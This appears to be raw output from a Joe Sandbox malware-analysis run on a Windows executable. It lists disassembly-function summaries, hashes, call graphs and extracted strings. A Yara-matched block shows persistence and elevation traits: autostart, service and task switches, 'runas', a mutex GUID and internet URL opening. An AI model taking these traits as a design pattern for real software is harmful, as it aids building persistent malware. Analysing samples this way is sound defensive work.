                                • Instruction Fuzzy Hash: 4401E932010209BBDF12AF95DD00EEA7BBAFF48754F158015FD1866124D77AE961DFA0
                                APIs
                                • __encode_pointer.LIBCMTD ref: 004068D7
                                  • Part of subcall function 00406610: TlsGetValue.KERNEL32(00000002,00406886,CAB8281C), ref: 00406625
                                  • Part of subcall function 00406610: TlsGetValue.KERNEL32(00000002,00000004), ref: 00406646
                                  • Part of subcall function 00406610: __crt_wait_module_handle.LIBCMTD ref: 0040665C
                                  • Part of subcall function 00406610: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406676
                                • __mtterm.LIBCMTD ref: 004068E5
                                • __initptd.LIBCMTD ref: 004068F4
                                • GetCurrentThreadId.KERNEL32 ref: 004068FC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Value$AddressCurrentProcThread__crt_wait_module_handle__encode_pointer__initptd__mtterm
                                • String ID:
                                • API String ID: 1673568325-0
                                • Opcode ID: aa5c264eef043635a6a4d737f0be6788e2b09cde4d867cc3199a8e18d750571d
                                • Instruction ID: 9660f59d39fb56ade82ca1f641df0a6eff677e3f469298acb72bb7fbb5292a2c
                                • Opcode Fuzzy Hash: aa5c264eef043635a6a4d737f0be6788e2b09cde4d867cc3199a8e18d750571d
                                • Instruction Fuzzy Hash: F0F0B4B5A00105AFC710EFB4DC45A9EBB74AB88308F1582B9E80AA73D1E636D561CB55
                                APIs
                                • __whiteout.LIBCMTD ref: 00407CBF
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00408CC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~___whiteout
                                • String ID: n
                                • API String ID: 2661511698-2013832146
                                • Opcode ID: ec6ec432462fd9d313dfb0ac09e9a787e7b066cf414d2b5395eda95c5664761b
                                • Instruction ID: 4cae57ddf79c39d5675552b6115618b60da6efa91157dc2b674a2f6bb85c01b5
                                • Opcode Fuzzy Hash: ec6ec432462fd9d313dfb0ac09e9a787e7b066cf414d2b5395eda95c5664761b
                                • Instruction Fuzzy Hash: 94419E70D092598BEF24CF54C4946EEBBB0AF41315F1481AFD8563A2C2C6396E80CF5A
                                APIs
                                • __whiteout.LIBCMTD ref: 00407CBF
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00408CC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~___whiteout
                                • String ID: n
                                • API String ID: 2661511698-2013832146
                                • Opcode ID: 74fe72603f79603b2a3e045f22a909e3ef8e59ed144a1609880730f4c395cea4
                                • Instruction ID: 4cae57ddf79c39d5675552b6115618b60da6efa91157dc2b674a2f6bb85c01b5
                                • Opcode Fuzzy Hash: 74fe72603f79603b2a3e045f22a909e3ef8e59ed144a1609880730f4c395cea4
                                • Instruction Fuzzy Hash: 94419E70D092598BEF24CF54C4946EEBBB0AF41315F1481AFD8563A2C2C6396E80CF5A
                                APIs
                                • __whiteout.LIBCMTD ref: 00407CBF
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00408CC6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~___whiteout
                                • String ID: n
                                • API String ID: 2661511698-2013832146
                                • Opcode ID: c655b13c87dadbdad50ae76e5020d21b876a293500f516cf7d05724c07b14e24
                                • Instruction ID: 586c8fc816a6f14237da24c8208b346aa8fdd0ee88eeaf29dfa75beef83920b9
                                • Opcode Fuzzy Hash: c655b13c87dadbdad50ae76e5020d21b876a293500f516cf7d05724c07b14e24
                                • Instruction Fuzzy Hash: C431A070D0D259CBEF24CF54D4946AEBBB0AF01315F2481AFE8563A2C2C6385E81DF1A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale__hextodec__inc__un_inc_isdigit_isxdigit$UpdateUpdate::~_
                                • String ID: p
                                • API String ID: 1652772854-2181537457
                                • Opcode ID: 77af3fe8994412ed81e027be8a7f0b999c3385dfabfa9f1e7a5825cd0fdc4e56
                                • Instruction ID: 0deffdf5ad2c82ffeab31650fa5b70b9ab6192b33619d8124283c14072eb029a
                                • Opcode Fuzzy Hash: 77af3fe8994412ed81e027be8a7f0b999c3385dfabfa9f1e7a5825cd0fdc4e56
                                • Instruction Fuzzy Hash: 072162B4D0426A8ACF25CF55C9503EEBBB1AF45308F1441FFD88576382EA394A81CF49
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID:
                                • String ID: QQ$s*@
                                • API String ID: 0-3432696855
                                • Opcode ID: 75285a33f3e3a8226227495b54544be31729fa98091c7b21b9d872baf7ad745d
                                • Instruction ID: 6717763b0cfdc194a53b4eb7d4b74d0116d5979edffe42134c9d59cba0394a18
                                • Opcode Fuzzy Hash: 75285a33f3e3a8226227495b54544be31729fa98091c7b21b9d872baf7ad745d
                                • Instruction Fuzzy Hash: CF0112B1604109EBDB14CF54CA48A9B73B4AB44304F14456AFD06A73C0D779EA51DB59
                                APIs
                                Strings
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 00403354
                                • _CrtCheckMemory(), xrefs: 00403348
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: CheckMemory
                                • String ID: _CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 2067751306-2660621803
                                • Opcode ID: d667119d453669df938e0c29b07545885a029a91b5af6da270094eec42f629c3
                                • Instruction ID: 8e74407d4bdd306bc9fb3ba4b48325dc3a889e0911a14d9008785705de69059f
                                • Opcode Fuzzy Hash: d667119d453669df938e0c29b07545885a029a91b5af6da270094eec42f629c3
                                • Instruction Fuzzy Hash: 6DF065706412459FEB209F2AED877663B9CB78070AF20413BED06A52D1EABD5644458F

                                Execution Graph

                                Execution Coverage:2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:33%
                                Total number of Nodes:810
                                Total number of Limit Nodes:90
_malloc 58 API calls 45224->45225 45228 40ef6e _memset 45225->45228 45226 40efdc 45226->44819 45227 420c62 _malloc 58 API calls 45227->45228 45228->45226 45228->45227 45228->45228 45230 413f05 45229->45230 45234 413eae 45229->45234 45231 413fb1 45230->45231 45232 413f18 45230->45232 45533 44f23e 59 API calls 2 library calls 45231->45533 45235 413fbb 45232->45235 45236 413f2d 45232->45236 45237 413f3d ___crtGetEnvironmentStringsW 45232->45237 45234->45230 45241 413ed4 45234->45241 45534 44f23e 59 API calls 2 library calls 45235->45534 45236->45237 45532 416760 59 API calls 2 library calls 45236->45532 45237->44819 45243 413ed9 45241->45243 45244 413eef 45241->45244 45530 413da0 59 API calls ___crtGetEnvironmentStringsW 45243->45530 45531 413da0 59 API calls ___crtGetEnvironmentStringsW 45244->45531 45248 413ee9 45248->44819 45249 413eff 45249->44819 45251 4146a9 45250->45251 45252 41478c 45250->45252 45253 4146b6 45251->45253 45254 4146e9 45251->45254 45537 44f26c 59 API calls 3 library calls 45252->45537 45256 4146c2 45253->45256 45257 414796 45253->45257 45258 4147a0 45254->45258 45259 4146f5 45254->45259 45535 413340 59 API calls _memmove 45256->45535 45538 44f26c 59 API calls 3 library calls 45257->45538 45539 44f23e 59 API calls 2 library calls 45258->45539 45271 414707 ___crtGetEnvironmentStringsW 45259->45271 45536 416950 59 API calls 2 library calls 45259->45536 45267 4146e0 45267->44834 45271->44834 45274 40d27d CoInitializeSecurity 45273->45274 45280 40d276 45273->45280 45275 414690 59 API calls 45274->45275 45276 40d2b8 CoCreateInstance 45275->45276 45277 40d2e3 VariantInit VariantInit VariantInit VariantInit 45276->45277 45278 40da3c CoUninitialize 45276->45278 45279 40d38e VariantClear VariantClear VariantClear VariantClear 45277->45279 45278->45280 45281 40d3e2 45279->45281 45282 40d3cc CoUninitialize 45279->45282 45280->44860 45540 40b140 45281->45540 45282->45280 45285 40d3f6 45545 40b1d0 45285->45545 45287 40d422 45288 40d426 CoUninitialize 
45287->45288 45289 40d43c 45287->45289 45288->45280 45290 40b140 60 API calls 45289->45290 45292 40d449 45290->45292 45293 40b1d0 SysFreeString 45292->45293 45294 40d471 45293->45294 45295 40d496 CoUninitialize 45294->45295 45296 40d4ac 45294->45296 45295->45280 45298 40b140 60 API calls 45296->45298 45353 40d8cf 45296->45353 45299 40d4d5 45298->45299 45300 40b1d0 SysFreeString 45299->45300 45301 40d4fd 45300->45301 45302 40b140 60 API calls 45301->45302 45301->45353 45303 40d5ae 45302->45303 45304 40b1d0 SysFreeString 45303->45304 45305 40d5d6 45304->45305 45306 40b140 60 API calls 45305->45306 45305->45353 45307 40d679 45306->45307 45308 40b1d0 SysFreeString 45307->45308 45309 40d6a1 45308->45309 45310 40b140 60 API calls 45309->45310 45309->45353 45311 40d6b6 45310->45311 45312 40b1d0 SysFreeString 45311->45312 45313 40d6de 45312->45313 45314 40b140 60 API calls 45313->45314 45313->45353 45315 40d707 45314->45315 45316 40b1d0 SysFreeString 45315->45316 45317 40d72f 45316->45317 45318 40b140 60 API calls 45317->45318 45317->45353 45319 40d744 45318->45319 45320 40b1d0 SysFreeString 45319->45320 45321 40d76c 45320->45321 45321->45353 45549 423aaf GetSystemTimeAsFileTime 45321->45549 45323 40d77d 45551 423551 45323->45551 45328 412c40 59 API calls 45329 40d7b5 45328->45329 45330 412900 60 API calls 45329->45330 45331 40d7c3 45330->45331 45332 40b140 60 API calls 45331->45332 45333 40d7db 45332->45333 45334 40b1d0 SysFreeString 45333->45334 45335 40d7ff 45334->45335 45336 40b140 60 API calls 45335->45336 45335->45353 45337 40d8a3 45336->45337 45338 40b1d0 SysFreeString 45337->45338 45339 40d8cb 45338->45339 45340 40b140 60 API calls 45339->45340 45339->45353 45341 40d8ea 45340->45341 45342 40b1d0 SysFreeString 45341->45342 45343 40d912 45342->45343 45343->45353 45559 40b400 SysAllocString 45343->45559 45345 40d936 VariantInit VariantInit 45346 40b140 60 API calls 45345->45346 45347 40d985 45346->45347 45348 40b1d0 SysFreeString 45347->45348 45349 40d9e7 VariantClear 
VariantClear VariantClear 45348->45349 45350 40da10 45349->45350 45351 40da46 CoUninitialize 45349->45351 45563 42052a 78 API calls vswprintf 45350->45563 45351->45280 45353->45278 45355->44793 45356->44837 45357->44838 45358->44874 45359->44877 45361 415c66 45360->45361 45366 415c1e 45360->45366 45362 415c76 45361->45362 45363 415cff 45361->45363 45370 415c88 ___crtGetEnvironmentStringsW 45362->45370 45719 416950 59 API calls 2 library calls 45362->45719 45720 44f23e 59 API calls 2 library calls 45363->45720 45366->45361 45371 415c45 45366->45371 45370->44881 45373 414690 59 API calls 45371->45373 45374 415c60 45373->45374 45374->44881 45375->44883 45376->44886 45377->44892 45378->44902 45380 413a90 59 API calls 45379->45380 45381 41294c MultiByteToWideChar 45380->45381 45382 418400 59 API calls 45381->45382 45383 41298d 45382->45383 45383->44905 45384->44910 45385->44918 45386->44924 45387->44928 45388->44932 45389->44936 45390->44940 45391->44944 45392->44948 45393->44950 45394->44952 45395->44954 45396->44956 45397->44958 45398->44960 45399->44962 45400->44964 45401->44966 45402->44968 45403->44970 45404->44972 45405->44974 45406->44976 45407->44978 45408->44980 45410 412c71 45409->45410 45411 412c5f 45409->45411 45414 4156d0 59 API calls 45410->45414 45412 4156d0 59 API calls 45411->45412 45413 412c6a 45412->45413 45413->44985 45415 412c8a 45414->45415 45415->44985 45416->44987 45417->45010 45418->45010 45419->45010 45420->44991 45421->44993 45422->44996 45423->44999 45424->45002 45425->45004 45426->45007 45427->45012 45428->45014 45429->45038 45430->45038 45431->45038 45432->45038 45433->45038 45434->45038 45721 41f130 218 API calls _TranslateName 45434->45721 45435->45018 45722 41fd80 64 API calls 45435->45722 45439 415735 45438->45439 45444 4156de 45438->45444 45440 4157bc 45439->45440 45441 41573e 45439->45441 45462 44f23e 59 API calls 2 library calls 45440->45462 45450 415750 ___crtGetEnvironmentStringsW 45441->45450 45461 416760 59 API calls 2 library 
calls 45441->45461 45444->45439 45448 415704 45444->45448 45451 415709 45448->45451 45452 41571f 45448->45452 45450->45139 45459 413ff0 59 API calls ___crtGetEnvironmentStringsW 45451->45459 45460 413ff0 59 API calls ___crtGetEnvironmentStringsW 45452->45460 45455 41572f 45455->45139 45456 415719 45456->45139 45457->45143 45458->45142 45459->45456 45460->45455 45461->45450 45469 423b4c 45463->45469 45465 41ccca 45468 41a00a 45465->45468 45479 44f1bb 59 API calls 3 library calls 45465->45479 45468->44795 45468->44796 45473 423b54 45469->45473 45470 420c62 _malloc 58 API calls 45470->45473 45471 423b6e 45471->45465 45473->45470 45473->45471 45474 423b72 std::exception::exception 45473->45474 45480 42793d DecodePointer 45473->45480 45481 430eca RaiseException 45474->45481 45476 423b9c 45482 430d91 58 API calls _free 45476->45482 45478 423bae 45478->45465 45480->45473 45481->45476 45482->45478 45484 423b4c 59 API calls 45483->45484 45485 41cc5d 45484->45485 45487 41cc64 45485->45487 45490 44f1bb 59 API calls 3 library calls 45485->45490 45487->45151 45489 41d740 59 API calls 45487->45489 45489->45151 45493->45168 45494->45168 45498 431570 45495->45498 45499 431580 45498->45499 45500 431586 45499->45500 45505 4315ae 45499->45505 45509 425208 58 API calls __getptd_noexit 45500->45509 45502 43158b 45510 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45502->45510 45506 4315cf wcstoxl 45505->45506 45511 42e883 GetStringTypeW 45505->45511 45508 41a36e lstrcpyW lstrcpyW 45506->45508 45512 425208 58 API calls __getptd_noexit 45506->45512 45508->44829 45509->45502 45510->45508 45511->45505 45512->45508 45514 411cf2 RegOpenKeyExW 45513->45514 45514->45175 45514->45199 45515->45184 45516->45202 45518 420241 45517->45518 45519 4202b6 45517->45519 45522 420266 45518->45522 45527 425208 58 API calls __getptd_noexit 45518->45527 45529 4202c8 60 API calls 3 library calls 45519->45529 45521 4202c3 45521->45222 45522->45222 45524 42024d 45528 4242d2 9 API calls 
__invalid_parameter_noinfo_noreturn 45524->45528 45526 420258 45526->45222 45527->45524 45528->45526 45529->45521 45530->45248 45531->45249 45532->45237 45535->45267 45536->45271 45537->45257 45538->45258 45541 423b4c 59 API calls 45540->45541 45542 40b164 45541->45542 45543 40b177 SysAllocString 45542->45543 45544 40b194 45542->45544 45543->45544 45544->45285 45546 40b1de 45545->45546 45548 40b202 45545->45548 45547 40b1f5 SysFreeString 45546->45547 45546->45548 45547->45548 45548->45287 45550 423add __aulldiv 45549->45550 45550->45323 45564 43035d 45551->45564 45553 42355a 45555 40d78f 45553->45555 45572 423576 45553->45572 45556 4228e0 45555->45556 45674 42279f 45556->45674 45560 40b423 45559->45560 45561 40b41d 45559->45561 45562 40b42d VariantClear 45560->45562 45561->45345 45562->45345 45563->45353 45605 42501f 58 API calls 4 library calls 45564->45605 45566 430369 45569 43038d 45566->45569 45606 425208 58 API calls __getptd_noexit 45566->45606 45567 430363 45567->45566 45567->45569 45571 428cde __malloc_crt 58 API calls 45567->45571 45569->45553 45570 43036e 45570->45553 45571->45566 45573 423591 45572->45573 45574 4235a9 _memset 45572->45574 45615 425208 58 API calls __getptd_noexit 45573->45615 45574->45573 45581 4235c0 45574->45581 45576 423596 45616 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45576->45616 45578 4235cb 45617 425208 58 API calls __getptd_noexit 45578->45617 45579 4235e9 45607 42fb64 45579->45607 45581->45578 45581->45579 45583 4235ee 45618 42f803 58 API calls __mbschr_l 45583->45618 45585 4235f7 45586 4237e5 45585->45586 45619 42f82d 58 API calls __mbschr_l 45585->45619 45632 4242fd 8 API calls 2 library calls 45586->45632 45589 423609 45589->45586 45620 42f857 45589->45620 45590 4237ef 45592 42361b 45592->45586 45593 423624 45592->45593 45594 42369b 45593->45594 45596 423637 45593->45596 45630 42f939 58 API calls 4 library calls 45594->45630 45627 42f939 58 API calls 4 library calls 45596->45627 45597 4236a2 45604 4235a0 
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 45597->45604 45631 42fbb4 58 API calls 4 library calls 45597->45631 45599 42364f 45599->45604 45628 42fbb4 58 API calls 4 library calls 45599->45628 45602 423668 45602->45604 45629 42f939 58 API calls 4 library calls 45602->45629 45604->45555 45605->45567 45606->45570 45608 42fb70 __getstream 45607->45608 45609 42fba5 __getstream 45608->45609 45610 428af7 __lock 58 API calls 45608->45610 45609->45583 45611 42fb80 45610->45611 45612 42fb93 45611->45612 45633 42fe47 45611->45633 45662 42fbab LeaveCriticalSection _doexit 45612->45662 45615->45576 45616->45604 45617->45604 45618->45585 45619->45589 45621 42f861 45620->45621 45622 42f876 45620->45622 45672 425208 58 API calls __getptd_noexit 45621->45672 45622->45592 45624 42f866 45673 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45624->45673 45626 42f871 45626->45592 45627->45599 45628->45602 45629->45604 45630->45597 45631->45604 45632->45590 45634 42fe53 __getstream 45633->45634 45635 428af7 __lock 58 API calls 45634->45635 45636 42fe71 _W_expandtime 45635->45636 45637 42f857 __tzset_nolock 58 API calls 45636->45637 45638 42fe86 45637->45638 45649 42ff25 __tzset_nolock __isindst_nolock 45638->45649 45663 42f803 58 API calls __mbschr_l 45638->45663 45641 42fe98 45641->45649 45664 42f82d 58 API calls __mbschr_l 45641->45664 45642 42ff71 GetTimeZoneInformation 45642->45649 45645 42feaa 45645->45649 45665 433f99 58 API calls 2 library calls 45645->45665 45646 42ffd8 WideCharToMultiByte 45646->45649 45648 42feb8 45666 441667 78 API calls 3 library calls 45648->45666 45649->45642 45649->45646 45650 430010 WideCharToMultiByte 45649->45650 45655 43ff8e 58 API calls __tzset_nolock 45649->45655 45660 423c2d 61 API calls UnDecorator::getTemplateArgumentList 45649->45660 45661 430157 __tzset_nolock __isindst_nolock __getstream 45649->45661 45669 4242fd 8 API calls 2 library calls 45649->45669 45670 420bed 58 API calls 2 library calls 45649->45670 45671 4300d7 
LeaveCriticalSection _doexit 45649->45671 45650->45649 45653 42ff0c _strlen 45656 428cde __malloc_crt 58 API calls 45653->45656 45654 42fed9 type_info::before 45654->45649 45654->45653 45667 420bed 58 API calls 2 library calls 45654->45667 45655->45649 45658 42ff1a _strlen 45656->45658 45658->45649 45668 42c0fd 58 API calls __mbschr_l 45658->45668 45660->45649 45661->45612 45662->45609 45663->45641 45664->45645 45665->45648 45666->45654 45667->45653 45668->45649 45669->45649 45670->45649 45671->45649 45672->45624 45673->45626 45701 42019c 45674->45701 45677 4227d4 45709 425208 58 API calls __getptd_noexit 45677->45709 45679 4227d9 45710 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45679->45710 45680 4227e9 MultiByteToWideChar 45682 422804 GetLastError 45680->45682 45683 422815 45680->45683 45711 4251e7 58 API calls 3 library calls 45682->45711 45686 428cde __malloc_crt 58 API calls 45683->45686 45684 40d7a3 45684->45328 45688 42281d 45686->45688 45687 422810 45714 420bed 58 API calls 2 library calls 45687->45714 45688->45687 45689 422825 MultiByteToWideChar 45688->45689 45689->45682 45691 42283f 45689->45691 45693 428cde __malloc_crt 58 API calls 45691->45693 45692 4228a0 45715 420bed 58 API calls 2 library calls 45692->45715 45695 42284a 45693->45695 45695->45687 45712 42d51e 88 API calls 3 library calls 45695->45712 45697 422866 45697->45687 45698 42286f WideCharToMultiByte 45697->45698 45698->45687 45699 42288b GetLastError 45698->45699 45713 4251e7 58 API calls 3 library calls 45699->45713 45702 4201ad 45701->45702 45708 4201fa 45701->45708 45716 425007 58 API calls 2 library calls 45702->45716 45704 4201b3 45705 4201da 45704->45705 45717 4245dc 58 API calls 6 library calls 45704->45717 45705->45708 45718 42495e 58 API calls 6 library calls 45705->45718 45708->45677 45708->45680 45709->45679 45710->45684 45711->45687 45712->45697 45713->45687 45714->45692 45715->45684 45716->45704 45717->45705 45718->45708 45719->45370 45726 427e1a __getstream 
45725->45726 45727 428af7 __lock 51 API calls 45726->45727 45728 427e21 45727->45728 45729 427eda _doexit 45728->45729 45730 427e4f DecodePointer 45728->45730 45745 427f28 45729->45745 45730->45729 45732 427e66 DecodePointer 45730->45732 45738 427e76 45732->45738 45734 427f37 __getstream 45734->45041 45736 427e83 EncodePointer 45736->45738 45737 427f1f 45739 427b0b _fast_error_exit 3 API calls 45737->45739 45738->45729 45738->45736 45740 427e93 DecodePointer EncodePointer 45738->45740 45741 427f28 45739->45741 45743 427ea5 DecodePointer DecodePointer 45740->45743 45742 427f35 45741->45742 45750 428c81 LeaveCriticalSection 45741->45750 45742->45041 45743->45738 45746 427f08 45745->45746 45747 427f2e 45745->45747 45746->45734 45749 428c81 LeaveCriticalSection 45746->45749 45751 428c81 LeaveCriticalSection 45747->45751 45749->45737 45750->45742 45751->45746
                                APIs
                                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                • GetLastError.KERNEL32 ref: 00419FD2
                                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                • GetLastError.KERNEL32 ref: 00419FE4
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0067B1E0,?), ref: 0041A0BB
                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
